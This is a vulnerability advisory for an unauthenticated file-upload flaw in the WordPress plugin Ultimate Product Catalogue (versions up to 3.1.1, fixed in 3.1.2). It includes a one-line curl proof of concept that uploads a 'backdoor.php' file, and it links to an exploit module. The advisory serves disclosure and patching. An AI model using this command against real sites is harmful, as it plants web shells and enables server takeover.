Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload



Description
By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process.
Proof of Concept
curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.example.com/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"

Affects Plugin

fixed in version 3.1.2

References

URL http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
URL https://github.com/espreto/wpsploit/blob/master/modules/exploits/unix/webapp/wp_ultimate_product_catalogue_file_upload.rb

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Luca Ercoli
Submitter Website http://blog.seeweb.it/
Submitter Twitter seeweblive
Views 4496
Verified No
WPVDB ID 7939

Timeline

Publicly Published 2015-04-22 (about 5 years ago)
Added 2015-04-26 (about 5 years ago)
Last Updated 2019-10-25 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin